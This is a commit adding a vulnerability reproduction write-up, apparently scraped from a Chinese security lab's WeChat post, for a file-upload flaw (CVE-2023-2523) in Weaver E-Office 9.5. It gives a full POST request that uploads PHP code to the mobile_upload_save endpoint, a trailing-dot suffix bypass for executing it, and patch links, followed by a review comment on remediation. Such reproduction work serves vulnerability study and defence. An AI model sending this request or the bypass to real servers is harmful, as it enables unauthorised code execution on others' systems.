
Commit

Upload new file: 泛微 E-Office 文件上传漏洞 (CVE-2023-2523).md via simpread
MrWQ committed Aug 28, 2023
1 parent 47fb47e commit 27da222
Showing 1 changed file with 147 additions and 0 deletions.
147 changes: 147 additions & 0 deletions bugs/泛微 E-Office 文件上传漏洞 (CVE-2023-2523).md
@@ -0,0 +1,147 @@
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/DrgEJ6E8xymVCEkvJo92WQ)


网安引领时代,弥天点亮未来





![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x00 写在前面**



**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x01 漏洞介绍**

Weaver E-Office 是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5 版本存在代码问题漏洞,该漏洞源于 App/Ajax/ajax.php?action=mobile_upload_save 存在未知函数,通过参数 upload_quwan 导致不受限制的上传。

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x02 影响版本**



Weaver E-Office 9.5 版本

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbNVcqyB4Q5kQQSWKL8zTjAyyuKSuNXLQ6sr7CnoOPJajfcafq5TmmfA/640?wx_fmt=png)

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x03 漏洞复现**



1. 部署漏洞环境访问

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbTprmy4g99pVrgeegOk4l4WW2LHiaDdpOhyl72A5DuiaSk1PFBQzbcR2w/640?wx_fmt=png)

默认用户 admin,空密码登录

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbtiaexYe1xiaWOFbqV7fvHP55icSBFoch46gj3bGBkddD5S7BWA1YSwTvg/640?wx_fmt=png)

2. 对漏洞进行复现

**Poc (POST)**

```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data;
Content-Type: image/jpeg
<?php phpinfo();?>
-------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data;
Content-Type: application/octet-stream
```

漏洞复现

访问路径若存在该文件,可能存在漏洞

```
http://10.211.55.3:8082/E-mobile/App/Ajax/ajax.php
```

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbIkbiaUX6j9vnia7JLHHN3JXt0rgGWibwppc3sERCnEjBgVYas2LeiaQiajQ/640?wx_fmt=png)

POST 请求,响应存在漏洞

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbJnJKyRZ4hf166Fibx2aDBsb4cbltvnba9ibr22bFhibm7XCBI7gA0Dvvg/640?wx_fmt=png)

        解析 php 文件 (**注意后缀绕过**)

```
http://10.211.55.3:8082/attachment//2856423138/888.php.
```

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbNAdsTX3qADj8ichrHbkXPBia46mRsfY98DJtVKGqse99Wib2mH3Qf8RBQ/640?wx_fmt=png)

3.**Getshell** 同泛微 E-Office 文件上传漏洞 (CVE-2023-2648) 操作,这里省略.......

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x04 修复建议**



目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

```
https://service.e-office.cn/download
https://global.weaver.com.cn/website/en/eoffice.html
```

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于 2019 年 2 月 19 日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

![](https://mmbiz.qpic.cn/mmbiz_gif/b96CibCt70iaaqjXT4YxgHVARD1NNv0RvKtiaAvXhmruVqgavPY3stwrfvLKetGycKUfxIq3Xc6F6dhU7eb4oh2gg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1) 

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,

予以风动,

必降弥天之润!

   弥  天

安全实验室

![](https://mmbiz.qpic.cn/mmbiz_jpg/MjmKb3ap0hDyTJAqicycpl7ZakwfehdOgvOqd7bOUjVTdwxpfudPLOJcLiaSZnMC7pDDdlIF4TWBWWYnD04wX7uA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1)
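Review bot: The remediation section (0x04) gives only two download links and does not name the fixed release or any interim mitigation, even though 0x02 states the affected version as 9.5; name the patched version and add steps a defender can act on before patching, such as restricting access to App/Ajax/ajax.php?action=mobile_upload_save and stopping the web server from executing PHP under the attachment directory shown in 0x03. Step 1 of 0x03 logs in as admin with an empty password, so the fix section should also call for changing that default account. The lab introduction and slogan lines after the links, and the divider images hot-linked to mmbiz.qpic.cn throughout, are simpread scrape residue and should be dropped from the repository copy, since the screenshots will break when the CDN links expire.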
